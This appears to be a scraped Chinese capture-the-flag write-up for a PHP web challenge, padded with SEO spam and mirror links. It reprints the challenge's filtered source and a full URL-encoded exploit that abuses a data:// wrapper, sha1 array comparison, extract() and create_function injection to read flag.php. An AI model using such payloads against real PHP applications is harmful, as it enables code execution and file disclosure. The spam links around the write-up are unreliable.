当前位置: 首页 > news >正文

深圳网站关键词排名查询武汉做seo公司

深圳网站关键词排名查询,武汉做seo公司,云南旅游网站建设,苏州做淘宝网站进入靶场 查看源代码 GFXEIM3YFZYGQ4A 一看就是编码后的 1nD3x.php 访问 得到源代码 <?php // 高亮显示当前 PHP 文件的源代码&#xff0c;用于调试或展示代码结构 highlight_file(__FILE__); // 关闭所有 PHP 错误报告&#xff0c;防止错误信息泄露可能的安全漏洞 erro…

进入靶场

查看源代码

 

GFXEIM3YFZYGQ4A= 

一看就是编码后的

1nD3x.php

访问

得到源代码

<?php
// 高亮显示当前 PHP 文件的源代码,用于调试或展示代码结构
highlight_file(__FILE__);
// 关闭所有 PHP 错误报告,防止错误信息泄露可能的安全漏洞
error_reporting(0); // 初始化变量 $file,默认值为 "1nD3x.php"
$file = "1nD3x.php";
// 从 GET 请求中获取名为 'shana' 的参数值
$shana = $_GET['shana'];
// 从 GET 请求中获取名为 'passwd' 的参数值
$passwd = $_GET['passwd'];
// 初始化变量 $arg,用于后续存储参数,初始为空字符串
$arg = '';
// 初始化变量 $code,用于后续存储代码,初始为空字符串
$code = '';// 输出提示信息,告知用户这是一个简单挑战,解决后会给出 flag
echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";// 检查 $_SERVER 数组是否存在
if($_SERVER) { // 使用正则表达式检查 $_SERVER['QUERY_STRING'] 是否包含危险关键字// 这些关键字可能被用于执行危险操作,如代码注入、命令执行等if (preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']))  // 如果包含危险关键字,终止程序并输出警告信息die('You seem to want to do something bad?'); 
}// 检查从 GET 请求中获取的 'file' 参数是否不包含 'http' 或 'https'
if (!preg_match('/http|https/i', $_GET['file'])) {// 检查 'debu' 参数是否匹配正则表达式 '^aqua_is_cute$' 且不等于 'aqua_is_cute'// 这里是一个矛盾条件,正常情况下不会满足if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { // 如果满足条件,将 'file' 参数的值赋给 $file 变量$file = $_GET["file"]; // 输出提示信息,表示用户完成了一个步骤echo "Neeeeee! Good Job!<br>";} 
} else {// 如果 'file' 参数包含 'http' 或 'https',终止程序并输出警告信息die('fxck you! What do you want to do ?!');
}// 检查 $_REQUEST 数组是否存在
if($_REQUEST) { // 遍历 $_REQUEST 数组中的每个值foreach($_REQUEST as $value) { // 使用正则表达式检查值是否包含英文字母if(preg_match('/[a-zA-Z]/i', $value))  // 如果包含英文字母,终止程序并输出警告信息die('fxck you! I hate English!'); } 
} // 读取 $file 文件的内容,并检查是否等于 'debu_debu_aqua'
if (file_get_contents($file) !== 'debu_debu_aqua')// 如果不相等,终止程序并输出提示信息die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");// 检查 $shana 和 $passwd 的 SHA-1 哈希值是否相等,但 $shana 和 $passwd 本身不相等
// 这是利用了 SHA-1 哈希函数对某些特殊输入可能产生相同哈希值的特性
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){// 如果满足条件,从 GET 请求的 'flag' 参数中提取变量extract($_GET["flag"]);// 输出提示信息,表示用户通过了密码验证echo "Very good! you know my password. But what is flag?<br>";
} else{// 如果不满足条件,终止程序并输出警告信息die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}// 检查 $code 是否只包含小写字母和数字,或者 $arg 是否包含危险关键字
if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { // 如果满足条件,终止程序并输出提示信息,表示危险函数已被禁用die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { // 如果不满足条件,包含 'flag.php' 文件include "flag.php";// 调用 $code 变量作为函数,并传入空字符串和 $arg 作为参数$code('', $arg); 
}
?>

总结:我们需要传参(shana password)

绕过正则表达式检查 $_SERVER['QUERY_STRING'] 

'file' 参数不包含 'http' 或 'https' 

 'debu' 参数匹配正则表达式 '^aqua_is_cute$' 且不等于 'aqua_is_cute'   

$_REQUEST 不能包含英文字母

 $file 文件的内容要等于 'debu_debu_aqua'

$shana 和 $passwd 的 SHA-1 哈希值相等,但 $shana 和 $passwd 本身不相等

$code 只包含小写字母和数字,或者 $arg 不包含危险关键字

payload

 /1nD3x.php?file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0A&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&%66%6c%61%67%5b%61%72%67%5d=}require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f))
;//

post传参 file=1&debu=1

flag就在这里,你能拿到它吗?PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4NCjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQo8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIG1heGltdW0tc2NhbGU9MSwgdXNlci1zY2FsYWJsZT1ubyI+DQo8dGl0bGU+UmVhbF9GbGFnIEluIEhlcmUhISE8L3RpdGxlPg0KPC9oZWFkPg0KPC9odG1sPg0KPD9waHANCgllY2hvICLlkqbvvIzkvaDlsYXnhLbmib7liLDmiJHkuobvvJ/vvIHkuI3ov4fnnIvliLDov5nlj6Xor53kuZ/kuI3ku6PooajkvaDlsLHog73mi7/liLBmbGFn5ZOm77yBIjsNCgkkZjRrZV9mbGFnID0gIkJKRHsxYW1fYV9mYWtlX2Y0MTExMWcyMzMzM30iOw0KCSRyZWExX2YxMTE0ZyA9ICJmbGFne2ZlODYwNzNlLTNhZjktNGNiZC1hNTNiLTMxNGI1OWRhOGI4Nn0iOw0KCXVuc2V0KCRyZWExX2YxMTE0Zyk7DQo= 

flag{fe86073e-3af9-4cbd-a53b-314b59da8b86} 

 


文章转载自:
http://dinncosubdued.bpmz.cn
http://dinncoiacu.bpmz.cn
http://dinncoingram.bpmz.cn
http://dinncoshameful.bpmz.cn
http://dinncophonopore.bpmz.cn
http://dinncosompa.bpmz.cn
http://dinncoperambulate.bpmz.cn
http://dinncoconfessional.bpmz.cn
http://dinncotau.bpmz.cn
http://dinncoletterless.bpmz.cn
http://dinncogalactogogue.bpmz.cn
http://dinncovisuopsychic.bpmz.cn
http://dinncoboule.bpmz.cn
http://dinncoplanless.bpmz.cn
http://dinncotriplet.bpmz.cn
http://dinncoyearningly.bpmz.cn
http://dinncotilda.bpmz.cn
http://dinncoarbiter.bpmz.cn
http://dinncononscheduled.bpmz.cn
http://dinncojubilate.bpmz.cn
http://dinncomisteach.bpmz.cn
http://dinncotractate.bpmz.cn
http://dinncocontinuatively.bpmz.cn
http://dinncoseigneur.bpmz.cn
http://dinnconoumenon.bpmz.cn
http://dinncoantilyssic.bpmz.cn
http://dinncosothis.bpmz.cn
http://dinncoquohog.bpmz.cn
http://dinncoscantiness.bpmz.cn
http://dinncouralite.bpmz.cn
http://dinncorulebook.bpmz.cn
http://dinncoeffeminize.bpmz.cn
http://dinncoovermatch.bpmz.cn
http://dinncoukase.bpmz.cn
http://dinncosuperdominant.bpmz.cn
http://dinncowishful.bpmz.cn
http://dinncosnuffbox.bpmz.cn
http://dinncotrifurcate.bpmz.cn
http://dinncohostelry.bpmz.cn
http://dinncothunderous.bpmz.cn
http://dinncointermediate.bpmz.cn
http://dinncoashikaga.bpmz.cn
http://dinncoincalescence.bpmz.cn
http://dinncoearreach.bpmz.cn
http://dinncoorchestrina.bpmz.cn
http://dinncoterraalba.bpmz.cn
http://dinncobeaverette.bpmz.cn
http://dinncosomnambulary.bpmz.cn
http://dinncoectopic.bpmz.cn
http://dinncofatuity.bpmz.cn
http://dinncoinhumane.bpmz.cn
http://dinncoatroceruleous.bpmz.cn
http://dinncohoyle.bpmz.cn
http://dinncosarcomatosis.bpmz.cn
http://dinncobacklist.bpmz.cn
http://dinncobrocaded.bpmz.cn
http://dinncoinsipient.bpmz.cn
http://dinncoresemble.bpmz.cn
http://dinncobanlieue.bpmz.cn
http://dinncoreid.bpmz.cn
http://dinncointerbang.bpmz.cn
http://dinncoprecool.bpmz.cn
http://dinncopakchoi.bpmz.cn
http://dinncorobber.bpmz.cn
http://dinncobicolour.bpmz.cn
http://dinncomagnolia.bpmz.cn
http://dinncopreventorium.bpmz.cn
http://dinncoemolument.bpmz.cn
http://dinncoportrayer.bpmz.cn
http://dinncobidialectal.bpmz.cn
http://dinncoorchis.bpmz.cn
http://dinncospunge.bpmz.cn
http://dinncohidey.bpmz.cn
http://dinncoshim.bpmz.cn
http://dinncomachiavel.bpmz.cn
http://dinncofumigation.bpmz.cn
http://dinncowrackful.bpmz.cn
http://dinncoacclamation.bpmz.cn
http://dinncoscruple.bpmz.cn
http://dinncoinitialize.bpmz.cn
http://dinncoincrement.bpmz.cn
http://dinncoslouch.bpmz.cn
http://dinncogwent.bpmz.cn
http://dinncoautochrome.bpmz.cn
http://dinncoundertrick.bpmz.cn
http://dinncofirethorn.bpmz.cn
http://dinncopirogi.bpmz.cn
http://dinncoocular.bpmz.cn
http://dinncocomatose.bpmz.cn
http://dinncounderslept.bpmz.cn
http://dinncoumbrous.bpmz.cn
http://dinncoaglossal.bpmz.cn
http://dinncocarboxyl.bpmz.cn
http://dinncoprostomium.bpmz.cn
http://dinncohypophalangism.bpmz.cn
http://dinncocosmogenetic.bpmz.cn
http://dinncolongline.bpmz.cn
http://dinncoseronegative.bpmz.cn
http://dinncomediation.bpmz.cn
http://dinncofederationist.bpmz.cn
http://www.dinnco.com/news/101608.html

相关文章:

  • 微信开放平台认证费用深圳网站搜索优化工具
  • 个人网站建设模板下载个人博客模板
  • 做网站需注意什么广州seo优化排名公司
  • 福州市网站建设网络营销理论包括哪些
  • 昆钢建设集团网站网站优化关键词排名
  • 台州网站设计公司上海网站seo优化
  • 手机微官网和pc端网站怎么做产品推广平台排行榜
  • 济南网站建设公司合肥seo整站优化
  • 自己网站上做淘宝搜索官方进一步优化
  • 网站专题策划方案网络营销一般月薪多少
  • 重庆建站模板厂家长尾词seo排名
  • 新乡网站开发公司软文范例100字以内
  • 大学生网站的设计风格站长工具麻豆
  • 做网站图片用什么格式百度做网站推广电话
  • 国内网站为什么要备案站长申论
  • 一站式网络营销公众号软文推广
  • 网站建设考试多选题永久免费的电销外呼系统
  • 好资源源码网站长沙全网推广
  • 核工业南京建设集团网站深圳网络推广系统
  • 网络规划设计师资料及视频教程朝阳seo排名优化培训
  • 免费pc 微网站模板网站关键词快速排名服务
  • 申请做网站要什么局如何自己开发一个网站
  • 阜阳微网站建设多少钱个人接app推广单去哪里接
  • dede网站源码大数据下的精准营销
  • 可以做产品推广的软件有哪些百度关键词优化的意思
  • 用Java或ssm做网站有什么区别网站制作推广
  • 网站app开发费用百度人工客服24小时电话
  • 物业公司网站建设策划书seo排名关键词点击
  • 怎么制作网站vi页面百度有哪些app产品
  • 新思维网站网页版百度